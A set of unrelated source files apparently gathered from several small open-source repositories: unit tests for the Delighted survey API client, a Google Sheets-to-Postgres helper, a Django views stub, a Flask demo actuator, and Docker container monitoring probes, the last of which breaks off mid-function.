expected_headers['Authorization'] = 'Basic %s' % b64encode(b(client.api_key)).decode('ascii')
person = delighted.Person.create(**create_kwargs)
self.assertTrue(delighted.Person is type(person))
self.assertEqual(person, {'id': '123', 'email': email})
self.assertEqual(person.email, email)
self.assertEqual('123', person.id)
self.check_call('post', url, expected_headers, {'email': email}, None)
def test_creating_or_updating_a_person(self):
self.check_creating_or_updating_a_person()
def test_creating_or_updating_a_person_other_client(self):
client = delighted.Client(api_key='example')
self.check_creating_or_updating_a_person(client=client)
def test_unsubscribing_a_person(self):
email = '<EMAIL>'
data = {'person_email': email}
url = 'https://api.delightedapp.com/v1/unsubscribes'
self.mock_response(200, {}, {'ok': True})
delighted.Unsubscribe.create(person_email=email)
self.check_call('post', url, post_headers, data, None)
def test_deleting_a_person_by_multiple_identifiers(self):
self.assertRaises(ValueError, lambda: delighted.Person.delete(id=42, email="<EMAIL>"))
def test_deleting_a_person_by_id(self):
url = 'https://api.delightedapp.com/v1/people/42'
self.mock_response(202, {}, {'ok': True})
delighted.Person.delete(id=42)
self.check_call('delete', url, post_headers, {}, None)
def test_deleting_a_person_by_email(self):
url = 'https://api.delightedapp.com/v1/people/email%3Afoo%40example.com'
self.mock_response(202, {}, {'ok': True})
delighted.Person.delete(email='<EMAIL>')
self.check_call('delete', url, post_headers, {}, None)
def test_deleting_a_person_by_phone_number(self):
url = 'https://api.delightedapp.com/v1/people/phone_number%3A%2B14155551212'
self.mock_response(202, {}, {'ok': True})
delighted.Person.delete(phone_number='+14155551212')
self.check_call('delete', url, post_headers, {}, None)
def test_deleting_pending_survey_requests_for_a_person(self):
email = '<EMAIL>'
url = 'https://api.delightedapp.com/v1/people/foo%40bar.com' + \
'/survey_requests/pending'
self.mock_response(200, {}, {'ok': True})
result = delighted.SurveyRequest.delete_pending(person_email=email)
self.assertTrue(dict is type(result))
self.assertEqual({'ok': True}, result)
self.check_call('delete', url, post_headers, {}, None)
def test_creating_a_survey_response(self):
url = 'https://api.delightedapp.com/v1/survey_responses'
data = {'id': '456', 'person': '123', 'score': 10}
self.mock_response(200, {}, data)
survey_response = delighted.SurveyResponse.create(person='123',
score=10)
self.assertTrue(delighted.SurveyResponse is type(survey_response))
self.assertEqual({'id': '456', 'person': '123', 'score': 10}, survey_response)
self.assertEqual('123', survey_response.person)
self.assertEqual(10, survey_response.score)
self.assertEqual('456', survey_response.id)
resp = {'person': '123', 'score': 10}
self.check_call('post', url, post_headers, resp, None)
def test_retrieving_a_survey_response_expand_person(self):
url = 'https://api.delightedapp.com/v1/survey_responses/456'
resp = {'id': '456',
'person': {'id': '123', 'email': '<EMAIL>', 'type': 'aaa'},
'score': 10}
self.mock_response(200, {}, resp)
survey_response = delighted.SurveyResponse.retrieve('456',
expand=['person'])
self.check_call('get', url, get_headers, None, {'expand[]': 'person'})
self.assertTrue(delighted.SurveyResponse is type(survey_response))
self.assertTrue(delighted.Person is type(survey_response.person))
self.assertEqual(resp, survey_response)
self.assertEqual(
{'id': '123', 'email': '<EMAIL>', 'type': 'aaa'},
survey_response.person
)
self.assertEqual('123', survey_response.person.id)
self.assertEqual('<EMAIL>', survey_response.person.email)
self.assertEqual('aaa', survey_response.person.type)
self.assertEqual(10, survey_response.score)
self.assertEqual('456', survey_response.id)
def test_updating_a_survey_response(self):
url = 'https://api.delightedapp.com/v1/survey_responses/456'
data = {'person': '123', 'score': 10}
resp = {'id': '456', 'person': '123', 'score': 10}
self.mock_response(200, {}, resp)
old = {'id': '456', 'person': '321', 'score': 1}
survey_response = delighted.SurveyResponse(old)
survey_response.person = '123'
survey_response.score = 10
self.assertTrue(delighted.SurveyResponse is type(survey_response.save()))
self.check_call('put', url, post_headers, resp, None)
self.assertEqual(resp, survey_response)
self.assertEqual('123', survey_response.person)
self.assertEqual(10, survey_response.score)
self.assertEqual('456', survey_response.id)
def test_listing_all_survey_responses(self):
url = 'https://api.delightedapp.com/v1/survey_responses'
resp1 = {'id': '123', 'comment': 'One'}
resp2 = {'id': '456', 'comment': 'Two'}
self.mock_response(200, {}, [resp1, resp2])
survey_responses = delighted.SurveyResponse.all(order='desc')
self.check_call('get', url, get_headers, None, {'order': 'desc'})
self.assertTrue(list is type(survey_responses))
self.assertTrue(delighted.SurveyResponse is type(survey_responses[0]))
self.assertEqual({'id': '123', 'comment': 'One'}, survey_responses[0])
self.assertEqual('One', survey_responses[0].comment)
self.assertEqual('123', survey_responses[0].id)
self.assertTrue(delighted.SurveyResponse is type(survey_responses[1]))
self.assertEqual({'id': '456', 'comment': 'Two'}, survey_responses[1])
self.assertEqual('Two', survey_responses[1].comment)
self.assertEqual('456', survey_responses[1].id)
def test_listing_all_survey_responses_expand_person(self):
url = 'https://api.delightedapp.com/v1/survey_responses'
resp1 = {'id': '123', 'comment': 'One',
'person': {'id': '456', 'email': '<EMAIL>', 'type': 'aaa'}}
resp2 = {'id': '789', 'comment': 'Two',
'person': {'id': '012', 'email': '<EMAIL>', 'type': 'bbb'}}
self.mock_response(200, {}, [resp1, resp2])
survey_responses = delighted.SurveyResponse.all(expand=['person'])
self.check_call('get', url, get_headers, None, {'expand[]': 'person'})
self.assertTrue(list is type(survey_responses))
self.assertTrue(delighted.SurveyResponse is type(survey_responses[0]))
self.assertEqual(resp1, survey_responses[0])
self.assertEqual('One', survey_responses[0].comment)
self.assertEqual('123', survey_responses[0].id)
self.assertEqual(delighted.Person, type(survey_responses[0].person))
self.assertEqual(
{'id': '456', 'email': '<EMAIL>', 'type': 'aaa'},
survey_responses[0].person
)
self.assertEqual('456', survey_responses[0].person.id)
self.assertEqual('<EMAIL>', survey_responses[0].person.email)
self.assertEqual('aaa', survey_responses[0].person.type)
self.assertTrue(delighted.SurveyResponse is type(survey_responses[1]))
self.assertEqual(resp2, survey_responses[1])
self.assertEqual('Two', survey_responses[1].comment)
self.assertEqual('789', survey_responses[1].id)
self.assertEqual(delighted.Person, type(survey_responses[1].person))
self.assertEqual(
{'id': '012', 'email': '<EMAIL>', 'type': 'bbb'},
survey_responses[1].person
)
self.assertEqual('012', survey_responses[1].person.id)
self.assertEqual('<EMAIL>', survey_responses[1].person.email)
self.assertEqual('bbb', survey_responses[1].person.type)
def test_listing_all_people(self):
url = 'https://api.delightedapp.com/v1/people'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
person2 = {'id': '456', 'email': '<EMAIL>', 'name': '<NAME>'}
self.mock_response(200, {}, [person1, person2])
people = delighted.Person.all()
self.check_call('get', url, get_headers, {}, None)
self.assertTrue(list is type(people))
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual({'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}, people[0])
self.assertEqual('<EMAIL>', people[0].email)
self.assertEqual('<NAME>', people[0].name)
self.assertEqual('123', people[0].id)
self.assertTrue(delighted.Person is type(people[1]))
self.assertEqual({'id': '456', 'email': '<EMAIL>', 'name': '<NAME>'}, people[1])
self.assertEqual('<NAME>', people[1].name)
self.assertEqual('<EMAIL>', people[1].email)
self.assertEqual('456', people[1].id)
def test_listing_all_people_pagination(self):
url = 'https://api.delightedapp.com/v1/people'
url_next = 'http://api.delightedapp.com/v1/people?nextlink123'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
person2 = {'id': '456', 'email': '<EMAIL>', 'name': '<NAME>'}
person3 = {'id': '789', 'email': '<EMAIL>', 'name': '<NAME>'}
mock_response = delighted.http_response.HTTPResponse(200, {}, [person1, person2], {'next': {'url': url_next}})
mock_response_next = delighted.http_response.HTTPResponse(200, {}, [person3], {})
self.mock_multiple_responses([mock_response, mock_response_next])
people = []
for person in delighted.Person.list().auto_paging_iter():
people.append(person)
call_1 = {'meth': 'get', 'url': url, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_2 = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
self.check_multiple_call([call_1, call_2])
self.assertEqual(len(people), 3)
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual(person1, people[0])
self.assertTrue(delighted.Person is type(people[1]))
self.assertEqual(person2, people[1])
self.assertTrue(delighted.Person is type(people[2]))
self.assertEqual(person3, people[2])
def test_listing_all_people_pagination_rate_limited(self):
url = 'https://api.delightedapp.com/v1/people'
url_next = 'http://api.delightedapp.com/v1/people?nextlink123'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
mock_response = delighted.http_response.HTTPResponse(200, {}, [person1], {'next': {'url': url_next}})
mock_response_rate_limited = delighted.http_response.HTTPResponse(429, {'Retry-After': '10'}, [], {})
self.mock_multiple_responses([mock_response, mock_response_rate_limited])
people = []
with self.assertRaises(TooManyRequestsError) as context:
for person in delighted.Person.list().auto_paging_iter(auto_handle_rate_limits=False):
people.append(person)
self.assertEqual(context.exception.response.headers['Retry-After'], '10')
call_1 = {'meth': 'get', 'url': url, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_2 = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
self.check_multiple_call([call_1, call_2])
self.assertEqual(len(people), 1)
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual(person1, people[0])
def test_listing_all_people_pagination_auto_handle_rate_limit(self):
url = 'https://api.delightedapp.com/v1/people'
url_next = 'http://api.delightedapp.com/v1/people?nextlink123'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
person_next = {'id': '456', 'email': '<EMAIL>', 'name': 'Next Person'}
mock_response = delighted.http_response.HTTPResponse(200, {}, [person1], {'next': {'url': url_next}})
mock_response_rate_limited = delighted.http_response.HTTPResponse(429, {'Retry-After': '3'}, [], {})
mock_response_accepted = delighted.http_response.HTTPResponse(200, {}, [person_next], {})
self.mock_multiple_responses([mock_response, mock_response_rate_limited, mock_response_accepted])
people = []
with patch('time.sleep', return_value=None) as patched_time_sleep:
for person in delighted.Person.list().auto_paging_iter(auto_handle_rate_limits=True):
people.append(person)
patched_time_sleep.assert_called_once_with(3)
call_1 = {'meth': 'get', 'url': url, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_rejected = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_accepted = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
self.check_multiple_call([call_1, call_rejected, call_accepted])
self.assertEqual(len(people), 2)
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual(person1, people[0])
self.assertTrue(delighted.Person is type(people[1]))
self.assertEqual(person_next, people[1])
def test_listing_all_unsubscribes(self):
url = 'https://api.delightedapp.com/v1/unsubscribes'
resp1 = {'person_id': '123', 'email': '<EMAIL>', 'name': 'Foo', 'unsubscribed_at': 1440621400}
self.mock_response(200, {}, [resp1])
unsubscribes = delighted.Unsubscribe.all()
self.check_call('get', url, get_headers, {}, None)
self.assertTrue(list is type(unsubscribes))
self.assertTrue(delighted.Unsubscribe is type(unsubscribes[0]))
self.assertEqual(resp1, dict(unsubscribes[0]))
def test_listing_all_bounces(self):
url = 'https://api.delightedapp.com/v1/bounces'
resp1 = {'person_id': '123', 'email': '<EMAIL>', 'name': 'Foo', 'bounced_at': 1440621400}
self.mock_response(200, {}, [resp1])
bounces = delighted.Bounce.all()
self.check_call('get', url, get_headers, {}, None)
self.assertTrue(list is type(bounces))
self.assertTrue(delighted.Bounce is type(bounces[0]))
self.assertEqual(resp1, dict(bounces[0]))
def test_rate_limit_response(self, client=None):
self.mock_response(429, {'Retry-After': '5'}, {})
# https://docs.python.org/2/library/unittest.html#unittest.TestCase.assertRaises
# Ability to use assertRaises() as a context manager was added in 2.7
if sys.version_info < (2, 7):
self.assertRaises(delighted.errors.TooManyRequestsError, lambda: delighted.Metrics.retrieve(client=client))
else:
with self.assertRaises(delighted.errors.TooManyRequestsError) as context:
delighted.Metrics.retrieve(client=client)
self.assertEqual(5, context.exception.retry_after)
@classmethod
def _naive_date_to_epoch_seconds(cls, date_obj, timezone):
datetime_obj = timezone.localize(naive_date_to_datetime(date_obj))
return aware_datetime_to_epoch_seconds(datetime_obj)
```
|
{
"source": "jesska-f/g2pg",
"score": 3
}
|
#### File: g2pg/g2pg/g2pg.py
```python
import gspread_dataframe as gd
import gspread
import pandas as pd
from sqlalchemy import create_engine
from oauth2client.service_account import ServiceAccountCredentials
import json
from pangres import upsert
import os
import sys
from string import punctuation
def create_keyfile_dict():
"""
Creates a keyfile dictionary based on environment variables to be used in the oauth with google.\n
Follow these directions to get the json credentials file <https://gspread.readthedocs.io/en/latest/oauth2.html#for-bots-using-service-account>\n
Copy and paste the credentials in your .env file with the following format:
SHEET_TYPE= 'service_account'
SHEET_PROJECT_ID= 'api-project-XXX'
SHEET_PRIVATE_KEY_ID= '<KEY>'
SHEET_PRIVATE_KEY="-----BEGIN PRIVATE KEY-----\nNrDyLw … jINQh/9\n-----END PRIVATE KEY-----\n"
SHEET_CLIENT_EMAIL= '<EMAIL>'
SHEET_CLIENT_ID= '1234567890'
SHEET_AUTH_URI= 'https://accounts.google.com/o/oauth2/auth'
SHEET_TOKEN_URI= 'https://oauth2.googleapis.com/token'
SHEET_AUTH_PROVIDER_X509_CERT_URL= 'https://www.googleapis.com/oauth2/v1/certs'
SHEET_CLIENT_X509_CERT_URL= 'https://www.googleapis.com/robot/v1/metadata/bla...bla..bla.iam.gserviceaccount.com'
"""
variables_keys = {
"type": os.environ.get("SHEET_TYPE"),
"project_id": os.environ.get("SHEET_PROJECT_ID"),
"private_key_id": os.environ.get("SHEET_PRIVATE_KEY_ID"),
#this is so that python reads the newlines as newlines and not text
"private_key": os.environ.get("SHEET_PRIVATE_KEY").replace('\\n',"\n"),
"client_email": os.environ.get("SHEET_CLIENT_EMAIL"),
"client_id": os.environ.get("SHEET_CLIENT_ID"),
"auth_uri": os.environ.get("SHEET_AUTH_URI"),
"token_uri": os.environ.get("SHEET_TOKEN_URI"),
"auth_provider_x509_cert_url": os.environ.get("SHEET_AUTH_PROVIDER_X509_CERT_URL"),
"client_x509_cert_url": os.environ.get("SHEET_CLIENT_X509_CERT_URL")
}
    if variables_keys['type'] is None:
print('Issue with environment variables, please check that they have been set')
sys.exit(1)
return variables_keys
def get_df_from_gsheet(gsheet_name,worksheet_name='Sheet1',skiprows=0):
"""
Gets data from a google sheet worksheet and puts it in a DataFrame.\n
Authorises with google oauth based on the data specified in your environment variables (see `create_keyfile_dict()`).\n
Make sure the Gsheet has been shared with your `client_email` from your json credential file from google.\n
Opens the gsheet specified in gsheet_name and uses `Sheet1` if no worksheet_name is specified and puts the data in a dataframe.\n
Selects all the non null columns and rows, and renames the columns to be db friendly.
Parameters
----------
gsheet_name : str
Exact Name of Gsheet to extract data from.
worksheet_name : str, optional
Name of the worksheet to get the data from. (default is `Sheet1`)
skiprows : int
Rows to skip in the sheet before extracting the data
Returns
-------
A DataFrame containing the data in the google sheet.
"""
try:
        #build the keyfile dict once and authorise with google
        keyfile_dict = create_keyfile_dict()
        scope = ['https://spreadsheets.google.com/feeds',
                 'https://www.googleapis.com/auth/drive']
        credentials = ServiceAccountCredentials.from_json_keyfile_dict(keyfile_dict, scope)
gc = gspread.authorize(credentials)
except Exception as e:
print(e)
print('Auth with google unsuccessful, please check your credentials')
sys.exit(1)
try:
#Open the gsheet and put the data into a df
sheet = gc.open(gsheet_name).worksheet(worksheet_name)
sheet_df = gd.get_as_dataframe(sheet,evaluate_formulas=True,skiprows=skiprows)
except Exception as e:
print(e)
print('''Data extract from google sheet was unsuccessful.\nPlease check the name of the sheet and the worksheet, and that the client email specified in your env file has access to the sheet''')
sys.exit(1)
#find rows and columns with all nulls, to remove them from the df
try:
nans_rows = sheet_df[sheet_df.isnull().all(axis=1)].index[0]-1
nans_columns = sheet_df.columns.drop(sheet_df.columns[sheet_df.isnull().all()])
sheet_df = sheet_df.loc[:nans_rows,nans_columns]
    except Exception:
        #no fully empty rows/columns to trim (or slicing failed); keep the dataframe as-is
        pass
#change column names to be db friendly
sheet_df.columns = [("".join([i for i in c if i not in punctuation.replace('_','')])).lower().strip().replace(' ','_') for c in sheet_df.columns]
return sheet_df
def df_to_db(df, table_name,schema=None, index_name='index'):
"""
    Writes a DataFrame to the specified table in the PostgreSQL database.\n
    If the table exists, it will update existing rows and insert new rows; otherwise it will create the table.\n
This uses environment variables to access the DB. Make sure your .env file contains the following (replace with the relevant data):\n
DB_USER= 'username'
DB_PW = '<PASSWORD>'
DB_URL = 'db_address'
DB_NAME = 'my_exciting_db_name'
Parameters
----------
df : DataFrame
        The DataFrame to write to the db. Make sure your columns are of the dtype you want in the db.
table_name : str
The `table_name` to update or create the table with in the DB.
schema : str, optional
The schema where the table should be located. (default in None, which refers to the `public` schema)
index_name : str, optional
The index name (must be the index of your df). Default is `index`.
"""
#'postgresql://username:password@db_address/db'
try:
engine = create_engine('postgresql://'+os.environ.get('DB_USER') +':'+os.environ.get('DB_PW')+'@'+os.environ.get('DB_URL')+'/'+ os.environ.get('DB_NAME'))
except Exception as e:
print(e)
print('Could not establish connection to db. Please check credentials in .env file')
sys.exit(1)
try:
df.index.name = index_name
upsert(engine=engine,
df=df,
table_name=table_name,
if_row_exists='update',
schema=schema,
dtype=None)
except Exception as e:
print(e)
print('Could not write data to the specified table, check that the db credentials in .env file are correct and have write permissions')
sys.exit(1)
```
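Putting the two helpers together, the intended flow is a Google Sheet pulled into a DataFrame and upserted into Postgres. A minimal sketch with hypothetical sheet and table names, assuming the `SHEET_*` and `DB_*` environment variables described in the docstrings are set:
```python
# Pull the sheet into a cleaned DataFrame, then upsert it into the database.
df = get_df_from_gsheet("Monthly Budget", worksheet_name="Sheet1")
df_to_db(df, table_name="monthly_budget", schema=None, index_name="index")
```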
|
{
"source": "Jesskas/YAYDL",
"score": 2
}
|
#### File: yaydlsite/search_and_convert/views.py
```python
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404
from django.template import loader
# Youtube Search API stuff
# Called on GET /
def index(request):
return render(request, 'search_and_convert/search.html')
# Called on "Search" button click
def search(request):
# if (request.GET.get('searchBtn')):
# print('user click!')
# return HttpResponse("y halo thar")
# return 'hey'
# searchBtn = "hey"
return HttpResponse("Search")
#
# def select(request):
# return HttpResponse("Select")
#
# def convert(request):
# return HttpResponse("Convert")
# from django.shortcuts import render, get_object_or_404
# from django.http import HttpResponse, Http404
# from django.template import loader
#
# from .models import Question
#
# def index(request):
# latest_question_list = Question.objects.order_by('-pub_date')[:5]
# #template = loader.get_template('polls/index.html')
# context = { 'latest_question_list': latest_question_list, }
# #return HttpResponse(template.render(context, request))
# return render(request, 'polls/index.html', context)
#
# def detail(request, question_id):
# #try:
# # question = Question.objects.get(pk=question_id)
# #except Question.DoesNotExist:
# # raise Http404("Question does not exist")
# question = get_object_or_404(Question, pk=question_id)
# return render(request, 'polls/detail.html', {'question': question})
# #return HttpResponse("You're looking at question %s." % question_id)
#
# def results(request, question_id):
# return HttpResponse("You're looking at the results of question %s." % question_id)
#
# def vote(request, question_id):
# return HttpResponse("You're voting on question %s." % question_id)
```
|
{
"source": "jess-lammert/tut_finance_code",
"score": 3
}
|
#### File: jess-lammert/tut_finance_code/fin_script_v1.py
```python
##note. search "##" for user notes throughout
#%%SETUP
##set paths for each account folder containing csvs
cheq_dir = r"PATH"
sav_dir = r"PATH"
cred_dir = r"PATH"
##list desired column names, MUST have 'date' and 'amount' columns
cheq_cols = ["date","transaction","name", "memo", "amount"]
sav_cols = ["date","transaction","name", "memo", "amount"]
cred_cols = ["date","activity","merchant_name","merchant_type","amount"]
dirs = [cheq_dir, sav_dir, cred_dir]
#other iterables?
cols = [cheq_cols, sav_cols, cred_cols]
#%%IMPORT
import os
import glob
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.dates import date2num
import numpy as np
#%%FUNCTIONS
#read csvs as df
def read_files(account_dir, col_names):
#get list of file names
account_files = glob.glob(account_dir + "/*.csv")
account_dfs = []
for file in account_files: #for each file in folder
#read each csv as df, columns specified by col_names
account_df = pd.read_csv(file, header=0, names=col_names)
print(account_df)
account_dfs.append(account_df)
return account_dfs #list of dfs
#clean each df
def clean_dfs(account_dfs):
#set column types
for df in account_dfs:
#set date column to datetime, any format to yyyy-mm-dd
df["date"] = df["date"].apply(pd.to_datetime)
if type(df["amount"][0]) is str: #check if amount has special chars = str
df["amount"] = df["amount"].str.replace("$","")#remove $ in amount ##OTHER CHARS?
df["amount"] = pd.to_numeric(df["amount"])
#set type for any other columns?
print(df)
#combine all dfs for each account
account_df = pd.concat(account_dfs)
print(account_df)
return account_df #single concatenated df
#calculate running balance
def running_balance(account_df):
#filter for date and amount columns
bal_df = account_df[["date","amount"]]
#aggregate data by day
bal_df = bal_df.groupby("date", as_index = False).agg("sum")
#get account balances
end_balance = bal_df["amount"].sum() ##works from beginning of time, otherwise must be known?
start_balance = end_balance - bal_df["amount"].sum()
#record running balance
bal_df["balance"] = start_balance + bal_df["amount"].cumsum()
print(bal_df)
return bal_df
#plot balances ##needs aesthetics -- plots should be moved out of functions in future versions
def plot_balance(bal_df):
    #create the figure before plotting so the curve is drawn on it (not on a stale figure)
    fig = plt.figure(figsize=(8, 6))
    plt.plot(bal_df["date"], bal_df["balance"])
    plt.title("*Account* balance by date") ##make variable?
    plt.xlabel("Date")
    plt.ylabel("Balance ($)")
    plt.show()
    return fig
#%%START
#read files and clean dataframes
cheq_dfs = read_files(cheq_dir, cheq_cols)
sav_dfs = read_files(sav_dir, sav_cols)
cred_dfs = read_files(cred_dir, cred_cols)
#clean/combine dataframes
cheq_df = clean_dfs(cheq_dfs)
sav_df = clean_dfs(sav_dfs)
cred_df = clean_dfs(cred_dfs)
#record balances
cheq_bal = running_balance(cheq_df)
sav_bal = running_balance(sav_df)
#plot savings balance
sav_plot = plot_balance(sav_bal)
```
|
{
"source": "jessmaciel/tma-framework-e",
"score": 2
}
|
#### File: actuators/demo-actuator-python/demo-actuator.py
```python
from flask import Flask
from flask import request
import json
import os
import logging
import logging.config
from tmalibrary.actuator import *
demoActuator = Flask(__name__)
logger = logging.getLogger(__name__)
logger.info('Starting Demo Actuator')
@demoActuator.route('/ActuatorAPI/act', methods=['POST'])
def process_message():
    # load the json payload from the request body (named so the built-in input() is not shadowed)
    request_data = request.get_data()
    message = HandleRequest()
    payload = message.processRequest(request_data)
operation = executeaction(payload.action)
return message.generateResponse(str(operation))
# Execute the action
def executeaction(action):
logger.info('Action: %s', action)
switcher = {
"scale": "action " + action,
"sendMail": "action " + action,
"demoPython": "action" + action
}
return switcher.get(action, "Not defined action: " + action)
# load logging configuration file
def setup_logging(default_path='logging.json', env_key='LOG_CFG'):
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=logging.DEBUG)
if __name__ == '__main__':
setup_logging()
logger = logging.getLogger(__name__)
logger.info('Initializing Demo Actuator')
demoActuator.run(debug='True', host='0.0.0.0', port=8080)
```
|
{
"source": "jessmaciel/tma-framework-m",
"score": 2
}
|
#### File: probes/probe-k8s-docker/probe-k8s-docker.py
```python
import docker
import ast
import sys
import json
import time
from datetime import datetime
import requests
from tmalibrary.probes import *
# get stats from container
def get_container_stats(container_name, url, communication):
# connect to docker
cli = docker.from_env()
# get container
container = cli.containers.get(container_name)
# get stream of stats from container
stats_obj = container.stats()
for stat in stats_obj:
# print the response
send_stat(eval(stat), url, communication)
# send stat to API server
def send_stat(stat, url, communication):
# format the stats from container
stat_formatted = format(stat)
# url = 'http://0.0.0.0:5000/monitor'
response = communication.send_message(stat_formatted)
# format stat to
def format(stat):
st = [-1] * 96
# sometimes the following metrics can be empty (reboot can fix it). -1 -> empty
    # integer (floor) division keeps the list indices ints under Python 3
    if len(stat['blkio_stats']['io_service_bytes_recursive']) > 0:
        for i in range(0, 15, 3):
            st[i] = stat['blkio_stats']['io_service_bytes_recursive'][i // 3]['major']
            st[i + 1] = stat['blkio_stats']['io_service_bytes_recursive'][i // 3]['minor']
            st[i + 2] = stat['blkio_stats']['io_service_bytes_recursive'][i // 3]['value']
    if len(stat['blkio_stats']['io_serviced_recursive']) > 0:
        for i in range(15, 30, 3):
            st[i] = stat['blkio_stats']['io_serviced_recursive'][i // 3 - 5]['major']
            st[i + 1] = stat['blkio_stats']['io_serviced_recursive'][i // 3 - 5]['minor']
            st[i + 2] = stat['blkio_stats']['io_serviced_recursive'][i // 3 - 5]['value']
    if len(stat['blkio_stats']['io_queue_recursive']) > 0:
        for i in range(30, 45, 3):
            st[i] = stat['blkio_stats']['io_queue_recursive'][i // 3 - 10]['major']
            st[i + 1] = stat['blkio_stats']['io_queue_recursive'][i // 3 - 10]['minor']
            st[i + 2] = stat['blkio_stats']['io_queue_recursive'][i // 3 - 10]['value']
    if len(stat['blkio_stats']['io_service_time_recursive']) > 0:
        for i in range(45, 60, 3):
            st[i] = stat['blkio_stats']['io_service_time_recursive'][i // 3 - 15]['major']
            st[i + 1] = stat['blkio_stats']['io_service_time_recursive'][i // 3 - 15]['minor']
            st[i + 2] = stat['blkio_stats']['io_service_time_recursive'][i // 3 - 15]['value']
    if len(stat['blkio_stats']['io_wait_time_recursive']) > 0:
        for i in range(60, 75, 3):
            st[i] = stat['blkio_stats']['io_wait_time_recursive'][i // 3 - 20]['major']
            st[i + 1] = stat['blkio_stats']['io_wait_time_recursive'][i // 3 - 20]['minor']
            st[i + 2] = stat['blkio_stats']['io_wait_time_recursive'][i // 3 - 20]['value']
    if len(stat['blkio_stats']['io_merged_recursive']) > 0:
        for i in range(75, 90, 3):
            st[i] = stat['blkio_stats']['io_merged_recursive'][i // 3 - 25]['major']
            st[i + 1] = stat['blkio_stats']['io_merged_recursive'][i // 3 - 25]['minor']
            st[i + 2] = stat['blkio_stats']['io_merged_recursive'][i // 3 - 25]['value']
if len(stat['blkio_stats']['io_time_recursive']) > 0:
st[90] = stat['blkio_stats']['io_time_recursive'][0]['major']
st[91] = stat['blkio_stats']['io_time_recursive'][0]['minor']
st[92] = stat['blkio_stats']['io_time_recursive'][0]['value']
if len(stat['blkio_stats']['sectors_recursive']) > 0:
st[93] = stat['blkio_stats']['sectors_recursive'][0]['major']
st[94] = stat['blkio_stats']['sectors_recursive'][0]['minor']
st[95] = stat['blkio_stats']['sectors_recursive'][0]['value']
other_st = [
stat['num_procs'],
stat['cpu_stats']['cpu_usage']['total_usage'],
stat['cpu_stats']['cpu_usage']['percpu_usage'][0],
stat['cpu_stats']['cpu_usage']['usage_in_kernelmode'],
stat['cpu_stats']['cpu_usage']['usage_in_usermode'],
stat['cpu_stats']['system_cpu_usage'],
stat['cpu_stats']['online_cpus'],
stat['cpu_stats']['throttling_data']['periods'],
stat['cpu_stats']['throttling_data']['throttled_periods'],
stat['cpu_stats']['throttling_data']['throttled_time'],
stat['memory_stats']['usage'],
stat['memory_stats']['max_usage'],
stat['memory_stats']['stats']['active_anon'],
stat['memory_stats']['stats']['active_file'],
stat['memory_stats']['stats']['cache'],
stat['memory_stats']['stats']['dirty'],
stat['memory_stats']['stats']['hierarchical_memory_limit'],
stat['memory_stats']['stats']['inactive_anon'],
stat['memory_stats']['stats']['inactive_file'],
stat['memory_stats']['stats']['mapped_file'],
stat['memory_stats']['stats']['pgfault'],
stat['memory_stats']['stats']['pgmajfault'],
stat['memory_stats']['stats']['pgpgin'],
stat['memory_stats']['stats']['pgpgout'],
stat['memory_stats']['stats']['rss'],
stat['memory_stats']['stats']['rss_huge'],
stat['memory_stats']['stats']['total_active_anon'],
stat['memory_stats']['stats']['total_active_file'],
stat['memory_stats']['stats']['total_cache'],
stat['memory_stats']['stats']['total_dirty'],
stat['memory_stats']['stats']['total_inactive_anon'],
stat['memory_stats']['stats']['total_inactive_file'],
stat['memory_stats']['stats']['total_mapped_file'],
stat['memory_stats']['stats']['total_pgfault'],
stat['memory_stats']['stats']['total_pgmajfault'],
stat['memory_stats']['stats']['total_pgpgin'],
stat['memory_stats']['stats']['total_pgpgout'],
stat['memory_stats']['stats']['total_rss'],
stat['memory_stats']['stats']['total_rss_huge'],
stat['memory_stats']['stats']['total_unevictable'],
stat['memory_stats']['stats']['total_writeback'],
stat['memory_stats']['stats']['unevictable'],
stat['memory_stats']['stats']['writeback'],
stat['memory_stats']['limit'],
]
merge_st = st + other_st
# the timestamp is the same for all metrics from this stat variable (Python is not compatible with nanoseconds,
# so [:-4] -> microseconds)
timestamp = int(time.mktime(datetime.strptime(stat['read'][:-4], '%Y-%m-%dT%H:%M:%S.%f').timetuple()))
# message to sent to the server API
# follow the json schema
# sentTime = current time? Or the same timestamp from the metrics?
# need to change the probeId, resourceId and messageId
message = Message(probeId=1, resourceId=1, messageId=0, sentTime=int(time.time()), data=None)
# append measurement data to message
for i in range(len(merge_st)):
dt = Data(type="measurement", descriptionId=(i+1), observations=None)
obs = Observation(time=timestamp, value=merge_st[i])
dt.add_observation(observation=obs)
# append data to message
message.add_data(data=dt)
# return message formatted in json
return json.dumps(message.reprJSON(), cls=ComplexEncoder)
if __name__ == '__main__':
# receive the container name and server url as parameters
container_name = str(sys.argv[1] + '')
url = str(sys.argv[2] + '')
communication = Communication(url)
get_container_stats(container_name, url, communication)
```
#### File: probes/probe-python-demo/probe-python-demo.py
```python
import ast
import sys
import json
import time
from datetime import datetime
import requests
from tmalibrary.probes import *
def send_message(url, message_formated):
# url = 'http://0.0.0.0:5000/monitor'
headers = {'content-type': 'application/json'}
# return the response from Post request
    return requests.post(url, data=message_formated, headers=headers)
def create_message():
# the timestamp is the same for all metrics from this stat variable (Python is not compatible with nanoseconds,
# so [:-4] -> microseconds)
# message to sent to the server API
# follow the json schema
